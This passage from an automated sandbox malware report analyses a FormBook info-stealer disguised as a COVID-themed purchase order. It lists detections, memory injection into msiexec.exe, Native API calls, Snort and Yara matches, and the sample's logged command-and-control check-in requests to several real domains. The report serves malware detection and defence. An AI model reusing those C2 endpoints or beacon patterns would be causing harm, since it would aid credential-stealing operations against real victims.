"0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: Po-covid19 2372#w2..exe

ReversingLabs: Detection: 27%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Po-covid19 2372#w2..exe

Joe Sandbox ML: detected

Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack

Source: Po-covid19 2372#w2..exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Po-covid19 2372#w2..exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 4x nop then pop esi	3_2_004172D9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 4x nop then pop edi	3_2_00417D8F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop esi	14_2_006972D9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then pop edi	14_2_00697D8F

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80

Source: global traffic	HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1Host: www.thesaltlifestyle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.aduhelmfinancialsupport.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1Host: www.scientificimaginetics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1Host: www.johnemotions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.thesaltlifestyle.com

Source: explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.;
Source: explorer.exe, 00000004.00000000.281664878.000000000F5E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com-
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com.TTF
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/
Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com0
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com=
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF&
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comaA
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comalsF
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdZ
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdic
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdl
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comeH
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessed
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessedZ
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comgritoe
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comlic0
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comnc./S
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comoitu
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comow
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comzana
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn$
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn=
Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmpu
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/A
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Z
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ghtsl
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/?
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/~
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/w
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.7
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de.
Source: Po-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de3z
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deXz
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deo
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmp	String found in binary or memory: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041A070 NtClose,	3_2_0041A070
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041A120 NtAllocateVirtualMemory,	3_2_0041A120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00419F40 NtCreateFile,	3_2_00419F40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00419FF0 NtReadFile,	3_2_00419FF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041A072 NtClose,	3_2_0041A072
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041A11B NtAllocateVirtualMemory,	3_2_0041A11B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00419F3A NtCreateFile,	3_2_00419F3A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00419FEA NtReadFile,	3_2_00419FEA
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_01559910
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015599A0 NtCreateSection,LdrInitializeThunk,	3_2_015599A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559840 NtDelayExecution,LdrInitializeThunk,	3_2_01559840
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01559860
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_015598F0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559A50 NtCreateFile,LdrInitializeThunk,	3_2_01559A50
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_01559A00
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559A20 NtResumeThread,LdrInitializeThunk,	3_2_01559A20
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559540 NtReadFile,LdrInitializeThunk,	3_2_01559540
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015595D0 NtClose,LdrInitializeThunk,	3_2_015595D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559710 NtQueryInformationToken,LdrInitializeThunk,	3_2_01559710
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559780 NtMapViewOfSection,LdrInitializeThunk,	3_2_01559780
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_015597A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_01559660
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_015596E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559950 NtQueueApcThread,	3_2_01559950
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015599D0 NtCreateProcessEx,	3_2_015599D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155B040 NtSuspendThread,	3_2_0155B040
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559820 NtEnumerateKey,	3_2_01559820
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015598A0 NtWriteVirtualMemory,	3_2_015598A0
